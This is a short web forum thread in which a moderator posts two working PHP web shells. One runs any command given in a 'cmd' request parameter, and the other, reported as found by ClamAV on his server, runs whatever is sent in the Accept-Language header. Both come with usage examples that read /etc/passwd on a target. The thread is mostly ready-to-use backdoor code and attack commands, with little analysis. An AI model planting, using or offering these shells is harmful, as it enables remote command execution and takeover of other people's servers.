Let us talk about scripts, HTML, Perl, PHP, apache, etc.
-
Stevyn
- SysOp
- Posts:1786
- Joined:Mon Nov 09, 2009 10:03 am
- Location:Japan
-
Contact:
simple php backdoor
Post
by Stevyn » Thu Sep 20, 2018 6:03 pm
https://github.com/JohnTroony/php-websh ... ckdoor.php
Code: Select all
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
Contact me directly: Ironfeatherbooks (@) gmail.com
-
Stevyn
- SysOp
- Posts:1786
- Joined:Mon Nov 09, 2009 10:03 am
- Location:Japan
-
Contact:
Post
by Stevyn » Sat Jun 15, 2019 3:35 pm
clamAV found this one on my server:
Code: Select all
<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"));?>
example usage
Code: Select all
curl -H "Accept-Language: cat /etc/passwd" -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:72.0) Gecko/20132121 Firefox/19.0" http://192.168.110.114/webshells/48bytes.php
Contact me directly: Ironfeatherbooks (@) gmail.com
